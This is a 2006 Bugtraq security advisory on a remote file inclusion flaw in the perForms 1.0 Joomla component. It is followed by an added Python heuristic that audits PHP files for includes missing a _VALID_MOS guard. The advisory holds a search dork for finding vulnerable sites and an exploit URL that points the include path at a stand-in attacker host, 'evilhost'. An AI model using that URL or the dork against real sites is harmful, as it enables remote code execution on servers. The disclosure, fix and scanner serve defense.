Date: 13 Jul 2006 19:34:00 -0000
From: endeneu@...uxmail.com
To: bugtraq@...urityfocus.com
Subject: perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion

---------------------------------------------------------------------------
perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
---------------------------------------------------------------------------

Remote         : Yes
Critical Level : High

Vuln found in a log file: lazy 0day!!! :D

Description:
~~~~~~~~~~~~
Application : perForms Joomla Component
Version     : latest version [1.0]
URL         : http://forge.joomla.org/sf/projects/performs

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on

in /components/com_performs/com_performs/performs.php on lines 6-10

require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" );
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" );
require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php");

Exploit:
~~~~~~~~
dork: inurl:"com_performs" -> finds ~12.000 sites (!)

http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~
Add before code:

defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

Thx
~~~~
Who works for better code and better life!

----------------------------------------------------------------------------------------------------
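
For administrators checking other installed components for the same pattern, the following is an added example and not part of the original advisory or the perForms code. It is a text-based audit that reports include/require statements using $mosConfig_absolute_path that are reached before any defined('_VALID_MOS') guard. The function name, regexes and sample strings are assumptions constructed for illustration.

```python
import re

# Guard from the advisory's Fix section: defined('_VALID_MOS') or die(...)
GUARD_RE = re.compile(
    r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b", re.I)
# include/require statement whose path expression uses $mosConfig_absolute_path
# (PHP keywords are case-insensitive, variable names are not)
INCLUDE_RE = re.compile(
    r"\b(?i:(?:require|include)(?:_once)?)\b[^;]*\$mosConfig_absolute_path\b")
# Block comments, plus // or # comments that start a line (a simplification)
COMMENT_RE = re.compile(r"/\*.*?\*/|^[ \t]*(?://|#)[^\n]*", re.S | re.M)


def unguarded_includes(php_source):
    """Return [(line_no, statement_prefix)] for includes reached before a guard."""
    # Blank out comments but keep newlines so line numbers stay accurate;
    # a commented-out guard must not count as protection.
    code = COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), php_source)
    guard = GUARD_RE.search(code)
    guard_pos = guard.start() if guard else len(code)
    findings = []
    for m in INCLUDE_RE.finditer(code):
        if m.start() < guard_pos:
            line_no = code.count("\n", 0, m.start()) + 1
            findings.append((line_no, " ".join(m.group().split())))
    return findings


# Constructed samples built from two of the require_once lines quoted above.
VULNERABLE = '''<?php
require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" );
require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php");
'''
FIXED = VULNERABLE.replace(
    "<?php\n",
    "<?php\ndefined('_VALID_MOS') or die('Direct access to this location is not allowed.');\n")
COMMENTED_OUT = FIXED.replace("defined(", "// defined(")

if __name__ == "__main__":
    for name, src in [("vulnerable", VULNERABLE), ("fixed", FIXED),
                      ("guard commented out", COMMENTED_OUT)]:
        print(name, unguarded_includes(src))
```

This is a heuristic over source text, not a PHP parser, so treat a hit as a file to review by hand rather than as proof of exposure.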